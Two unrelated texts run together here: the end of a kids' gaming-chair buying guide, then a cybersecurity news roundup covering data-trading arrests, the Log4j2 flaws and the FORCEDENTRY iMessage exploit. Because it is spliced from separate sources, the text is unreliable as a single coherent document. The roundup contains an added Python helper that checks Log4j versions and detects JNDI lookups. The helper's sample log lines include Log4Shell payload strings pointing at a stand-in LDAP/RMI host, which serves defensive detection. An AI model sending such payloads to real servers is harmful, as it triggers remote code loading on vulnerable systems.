The X Rocker Mammoth gaming chair is also built with solid wood and a metal frame that can hold up to 300 pounds.

Measurements: 32″D x 40.9″W x 26″H

X Rocker RGB Prism Gaming Chair

Would your child like a bit of color in their gaming setup? The surface of the X Rocker RGB Prism is illuminated by RGB LED technology and may be customized with over 30 color and pattern options, all of which can be changed at the touch of a button.

But looks aside, this gaming chair also offers an ergonomic design for superior comfort. The backrest is adjustable to conform to the natural curvature of your spine, and the two speakers are placed on either side to give you an immersive audio experience. The chair is made with a vinyl and metal frame designed to last, and it can hold up to 300 pounds.

The Bluetooth/Wireless technology lets you connect to any gaming device in your home, and the 3.5mm stereo jack allows you to connect easily to any audio device. The chair also has an integrated control panel to adjust the sound, bass, and vibration.

The X Rocker RGB Prism gaming chair is perfect for children and adults alike, and it can be used with any gaming system.

Measurements: 33″D x 25″W x 45″H

Are X Rocker Gaming Chairs For Kids worth the investment?

X Rocker Gaming Chairs are not cheap. If you’re planning to get one for your child – or even for yourself – you’ll need to be prepared to spend a few hundred dollars on it. However, even if they seem very expensive, you should know that these chairs are built to last.

They’re not only ergonomically designed and incredibly comfortable, but also quite sturdy and very durable. This means the chair won’t tip over or break down easily.

Are X Rocker Gaming Chairs worth it, especially for kids? From our point of view, the answer is definitely “yes”! Not only do these chairs provide great comfort and improve gaming performance, but they’re also built to last. If you’re looking for a gaming chair that will make your child happy and comfortable and give them outstanding performance while playing video games, this is an excellent choice.

A fantastic video game chair can make your kid’s experience much better by enhancing their focus and improving their reaction time (allowing them to respond quickly and win the game). A video game chair that enhances kids’ performance in school or any other activity is a “must-have” for any parent.


The Good, the Bad and the Ugly in Cybersecurity – Week 51

The Good

Great news this week as details emerged of an operation in which law enforcement arrested 51 individuals accused of illegally trading the personal data of U.S., European and Ukrainian citizens. Cyber cops in Ukraine carried out raids in which around 100 databases containing stolen personal data spanning 2020-2021 were seized.

The databases reportedly contained information on some 300 million citizens of Ukraine, Europe and the United States. Depending on their content, the databases were sold from anywhere between $18 and $1800 a time. Police said they had also shut down a large site where the data was traded and blocked 30 other channels involved in the illegal dissemination of data.

Nineteen suspects have already been charged, with more expected to follow. Ukrainian authorities said that data theft had become increasingly attractive as the number of owners and managers of personal data in the private sector had increased. This presents new challenges, as many of these entities struggle with how to prevent and contain data breaches by determined, financially-motivated hackers.

The Bad

“The internet is on fire”, it was declared earlier this week, and the inferno continues to rage in the wake of the Apache Log4j2 vulnerabilities, more formally tracked as CVE-2021-44228 and CVE-2021-45046. Admins everywhere have been scrambling to find out how exposed they are to the critical remote code execution vulnerabilities in Apache’s Java logging library.

The first vulnerability affects Log4j2 versions 2.0-beta9 to 2.14.1. This was patched in version 2.15.0, released this week, but a second vulnerability that could allow a denial of service (DoS) attack in certain non-default configurations was subsequently discovered. That means administrators need to ensure affected products are updated to Log4j2 v2.16.0.

Infosec itself lost no time in coming up with proof-of-concept exploit code, and threat actors were also quick off the mark with cryptominer payloads. In the midst of the panic, predictions of widespread nation-state actor attacks and ransomware incidents have been rife, but none so far have come to light. The message everyone should be hearing is: expect that to change.

Windows and Linux devices are particularly at risk. macOS hasn’t shipped with Java for over a decade, but there are plenty of macOS applications that require a third-party JRE, including Crashplan, Ghidra, Jamf Pro and Gradle. Apple’s own Xcode 13.2 also contains a vulnerable version of Log4j2, though it’s unclear at this time how that could be exploited.

Organizations are urged to discover all internet-facing assets which use Log4j and that accept data input, to update or isolate those assets, and to monitor for anomalous traffic patterns, particularly around outbound JNDI LDAP/RMI traffic and DMZ-initiated outbound connections.
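As an added example (not code from the SentinelOne post), here is a small Python triage helper that does two of the things the advice above asks for: it classifies a discovered Log4j2 version against the ranges stated in this article, and it scans access-log lines for JNDI lookup strings that point at LDAP or RMI. The log lines, IP addresses and hostnames are constructed for the example.

```python
"""Log4j triage helpers: version classification and JNDI lookup detection.

Added example, not part of the original post. Version ranges follow the
article: CVE-2021-44228 affects 2.0-beta9 through 2.14.1, 2.15.0 fixes it,
and CVE-2021-45046 (DoS) means anything below 2.16.0 should still be updated.
"""
import re


def parse_version(text: str) -> tuple:
    """Turn '2.0-beta9' / '2.14.1' into a tuple that sorts correctly.

    Pre-releases (alpha/beta/rc) sort before the final release of the same
    number, so 2.0-beta8 < 2.0-beta9 < 2.0 < 2.14.1.
    """
    base, _, pre = text.strip().partition("-")
    parts = [int(p) for p in base.split(".")]
    while len(parts) < 3:
        parts.append(0)
    m = re.fullmatch(r"(alpha|beta|rc)(\d*)", pre.lower()) if pre else None
    if pre and not m:
        raise ValueError(f"unrecognised Log4j version: {text!r}")
    pre_key = (0, m.group(1), int(m.group(2) or 0)) if m else (1, "", 0)
    return (parts[0], parts[1], parts[2], pre_key)


FIRST_VULNERABLE = parse_version("2.0-beta9")
LAST_RCE_VULNERABLE = parse_version("2.14.1")
FIXED = parse_version("2.16.0")


def log4j_status(version: str) -> str:
    """Classify a Log4j2 version string found on an asset."""
    v = parse_version(version)
    if v < FIRST_VULNERABLE:
        return "not affected"
    if v <= LAST_RCE_VULNERABLE:
        return "vulnerable: CVE-2021-44228 RCE (update to 2.16.0)"
    if v < FIXED:
        return "partially patched: CVE-2021-45046 DoS (update to 2.16.0)"
    return "patched"


# Baseline indicator: a JNDI lookup naming an LDAP or RMI (or DNS) target.
# Case-insensitive because the lookup keyword itself is matched loosely.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns)\s*:", re.IGNORECASE)


def find_jndi_lookups(lines) -> list:
    """Return (line_number, scheme) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = JNDI_LOOKUP.search(line)
        if m:
            hits.append((n, m.group(1).lower()))
    return hits


# Constructed sample access-log lines (not real traffic); line 2 carries the
# indicator in the User-Agent field, line 4 in the query string.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [16/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [16/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '198.51.100.2 - - [16/Dec/2021:10:02:11 +0000] "GET /login HTTP/1.1" 302 0 "-" "curl/7.79"',
    '198.51.100.7 - - [16/Dec/2021:10:02:40 +0000] "GET /?q=${JNDI:RMI://example.invalid/x} HTTP/1.1" 400 0 "-" "-"',
]

if __name__ == "__main__":
    for ver in ("2.0-beta8", "2.0-beta9", "2.14.1", "2.15.0", "2.16.0"):
        print(f"{ver:>10}: {log4j_status(ver)}")
    print("JNDI lookups at:", find_jndi_lookups(SAMPLE_ACCESS_LOG))
```

The regex is a baseline, not a complete detector; pair it with the outbound LDAP/RMI traffic monitoring the article recommends.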

The Ugly

Sometimes, you have to just sit back and admire the dedication of both attackers and defenders to come up with, and discover, novel attacks. This week, hats off to Google’s Project Zero team for reversing and describing one of those “you wouldn’t believe it if it was in a movie” exploits, a nasty, clever, almost-impossible-to-believe exploit of Apple’s iMessage format that was used to target dissidents.

The zero-click exploit, which Project Zero describes as “one of the most technically sophisticated exploits we’ve ever seen”, was developed by the ever-notorious NSO group and sold to unknown regimes around the world. It came to light after Citizen Lab caught the zero-click exploit being used to target a Saudi activist.

The attack begins with a maliciously-crafted PDF file with a .gif file extension being sent to the target. The victim need not read or even open the message; all that is required is that the device receives it. On receipt of the iMessage and fake GIF file, Core Graphics APIs are called into action to parse the file. Here’s where things get crazy.

A zero-day vulnerability (now tracked as CVE-2021-30860) in the open-source PDF parser used by Apple allowed the attackers to construct an entire emulated computer architecture inside the parser’s JBIG2 decompression stream. As explained by Google’s Ian Beer and Samuel Groß:

“Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture…the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It’s pretty incredible, and at the same time, pretty terrifying.”

The full details are well worth a read for anyone interested in just what can be done with what started, after all is said and done, from a simple integer overflow. The resulting exploit, aka FORCEDENTRY, was patched by Apple back in September and affects iOS 14.7 and earlier, all versions of macOS Big Sur prior to 11.6, and watchOS 7.6.1 and earlier.